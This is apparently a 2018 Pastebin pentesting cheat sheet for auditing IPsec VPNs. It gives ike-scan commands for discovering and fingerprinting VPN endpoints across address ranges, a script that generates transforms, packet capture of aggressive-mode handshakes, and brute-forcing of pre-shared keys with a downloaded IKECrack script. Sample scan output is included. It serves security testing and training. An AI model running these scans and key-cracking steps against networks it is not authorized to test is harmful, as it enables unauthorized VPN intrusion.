Advertisement
joemccray

Old Skewl VPN Pentesting

Jan 22nd, 2018
1,639
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.97 KB | None | 0 0
  1. ################
  2. # VPN Auditing #
  3. ################
  4.  
  5.  
  6. ####################
  7. # Install IKE-Scan #
  8. ####################
  9.  
  10. ---------------------------Type This-----------------------------------
  11.  
  12. sudo apt-get install -y ike-scan
  13.  
  14. wget https://raw.githubusercontent.com/0x90/wifi-arsenal/master/IKECrack/ikecrack-snarf-1.00.pl
  15.  
  16. -----------------------------------------------------------------------
  17.  
  18.  
  19. #############
  20. # Discovery #
  21. #############
  22.  
  23. ---------------------------Type This-----------------------------------
  24.  
  25. [root@Linux j0e]# ike-scan -M 24.24.0.0/16 <--- Discovery of VPNs
  26.  
  27.  
  28. [root@Linux j0e]# ike-scan -M --aggressive 24.24.0.0/16 <--- Discovery of VPNs in agressive mode
  29.  
  30. -----------------------------------------------------------------------
  31.  
  32.  
  33. ##################
  34. # Fingerprinting #
  35. ##################
  36.  
  37. ---------------------------Type This-----------------------------------
  38.  
  39. [root@Linux j0e]# ike-scan -M --trans=5,2,1,2 --showbackoff 24.24.1.151 <--- Fingerprinting
  40. -----------------------------------------------------------------------
  41.  
  42.  
  43. *** If you are really having trouble figuring out what VPN is, then you might wanna try some different transforms.
  44. -----------------------------------------------------------------------
  45. #!/bin/sh
  46. # generate-transforms.sh
  47. # Encryption algorithms: DES, Triple-DES, AES/128, AES/192 and AES/256
  48. ENCLIST="1 5 7/128 7/192 7/256"
  49. # Hash algorithms: MD5 and SHA1
  50. HASHLIST="1 2"
  51. # Authentication methods: Pre-Shared Key, RSA Signatures, Hybrid Mode and XAUTH
  52. AUTHLIST="1 3 64221 65001"
  53. # Diffie-Hellman groups: 1, 2 and 5
  54. GROUPLIST="1 2 5"
  55. #
  56. for ENC in $ENCLIST; do
  57. for HASH in $HASHLIST; do
  58. for AUTH in $AUTHLIST; do
  59. for GROUP in $GROUPLIST; do
  60. echo "--trans=$ENC,$HASH,$AUTH,$GROUP"
  61. done
  62. done
  63. done
  64. done
  65. -----------------------------------------------------------------------
  66. ---------------------------Type This-----------------------------------
  67. [root@Linux j0e]# sh generate-transforms.sh | xargs --max-lines=8 ike-scan 24.24.1.151 <--- Fingerprinting
  68.  
  69. [root@Linux j0e]# ike-scan -M `perl -e 'print "--trans=2,3,4,5 " x 20 . "--trans 5,2,1,2";'` 24.24.1.151
  70.  
  71. [root@Linux j0e]# ike-scan --trans=5,2,1,2 --vendor=4048b7d56ebce88525e7de7f00d6c2d3c0000000 --multiline 24.24.1.151
  72.  
  73. -----------------------------------------------------------------------
  74. ################
  75. # PSK Cracking #
  76. ################
  77.  
  78. ---------------------------Type This-----------------------------------
  79. [root@Linux toolz]# /usr/sbin/tcpdump -nxq > logfile.dat
  80. -----------------------------------------------------------------------
  81.  
  82. or
  83.  
  84. ---------------------------Type This-----------------------------------
  85. windump -nxq -s 1500 port 500 > logfile.dat
  86. -----------------------------------------------------------------------
  87.  
  88. *****make connection attempt with VPN client, then stop the log capture.*****
  89. Because the VPN uses PSK you can do this without a password so this logfile
  90. will contain the actual PSK, and ikecrack-scarf will bruteforce it for you.
  91.  
  92. You have to attempt your connection with the VPN client software for that
  93. specific VPN, and the VPN needs to be in agressive mode.
  94.  
  95. ---------------------------Type This-----------------------------------
  96.  
  97. [root@Linux toolz]# perl ikecrack-snarf-1.00.pl 24.24.1.151.500
  98. -----------------------------------------------------------------------
  99.  
  100. *****IKECrack by default looks for "logfile.dat" in the current directory*****
  101.  
  102.  
  103.  
  104.  
  105. ----------------------------------------------------------------------------------------------------------------------
  106.  
  107. ---------------------------Type This-----------------------------------
  108. [root@LinuxLaptop toolz]# ike-scan -M 24.24.1.0/24
  109. -----------------------------------------------------------------------
  110.  
  111. Starting ike-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/ike-scan/ )
  112. 24.24.1.0 Notify message 14 (NO-PROPOSAL-CHOSEN)
  113. HDR=(CKY-R=ba78bba863d98025)
  114. 24.24.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN)
  115. HDR=(CKY-R=e9ba2df614761ad3)
  116. 24.24.1.2 Notify message 14 (NO-PROPOSAL-CHOSEN)
  117. 24.24.1.151 Main Mode Handshake returned
  118. HDR=(CKY-R=30a3910882ffea48)
  119. SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDur ation=28800)
  120. VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
  121. 24.24.1.162 Notify message 14 (NO-PROPOSAL-CHOSEN)
  122. HDR=(CKY-R=0000000000000000)
  123. 24.24.1.169 (24.24.1.162) Notify message 14 (NO-PROPOSAL-CHOSEN)
  124. HDR=(CKY-R=0000000000000000)
  125. 24.24.1.236 Main Mode Handshake returned
  126. HDR=(CKY-R=f31f790c32b65404)
  127. SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDur ation=28800)
  128. VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
  129.  
  130. Ending ike-scan 1.9: 256 hosts scanned in 39.640 seconds (6.46 hosts/sec). 2 re turned handshake; 12 returned notify
  131.  
  132. ---------------------------Type This-----------------------------------
  133. [root@LinuxLaptop toolz]# ike-scan -M --trans=5,2,1,2 --showbackoff 24.24.1.151
  134. -----------------------------------------------------------------------
  135.  
  136. Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
  137. 24.24.1.151 Main Mode Handshake returned
  138. HDR=(CKY-R=82c51aa0ae799258)
  139. SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
  140. VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
  141.  
  142.  
  143. IKE Backoff Patterns:
  144.  
  145. IP Address No. Recv time Delta Time
  146. 24.24.1.151 1 1182310337.727521 0.000000
  147. 24.24.1.151 2 1182310345.723607 7.996086
  148. 24.24.1.151 3 1182310353.723382 7.999775
  149. 24.24.1.151 4 1182310361.724154 8.000772
  150. 24.24.1.151 Implementation guess: Cisco VPN Concentrator
  151.  
  152. Ending ike-scan 1.9: 1 hosts scanned in 84.191 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement